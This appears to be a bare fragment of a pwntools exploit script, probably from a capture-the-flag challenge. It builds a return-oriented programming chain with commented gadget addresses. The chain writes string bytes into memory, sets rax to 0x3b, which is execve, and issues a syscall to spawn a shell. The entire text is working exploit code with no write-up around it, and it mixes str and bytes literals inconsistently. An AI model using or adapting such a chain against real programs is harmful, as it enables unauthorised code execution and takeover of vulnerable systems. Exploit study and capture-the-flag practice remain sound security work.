payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x44c070)+p64(0x41f486)
# 0x41f486: pop rdx ; retf 0xd
payload += p64(0x6e69622f)+p32(0x42095e)+p32(0x33)+p64(0x0)+"\x00"*5
# 0x42095e: add dword ptr [rdi], edx ; retf
payload += p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x44c074)+p64(0x41f486)
# 0x41f486: pop rdx ; retf 0xd
payload += p64(0x68662f)+p32(0x42095e)+p32(0x33)+p64(0x0)+"\x00"*5
# 0x42095e: add dword ptr [rdi], edx ; retf
payload += p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x44c070)+p64(0x43d825)
# 0x000000000043d825: pop rsi; ret 0; 
payload += p64(0x0)+p64(0x41f486)
# 0x41f486: pop rdx ; retf 0xd
payload += p64(0x0)+p32(0x40e131)+p32(0x33)+p64(0x0)+"\x00"*5
# 0x000000000040e131: pop rax; popfq; lea rsp, [rsp + 8]; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x0)+p64(0x40480b)
# 0x000000000040480b: syscall; 
payload += b''
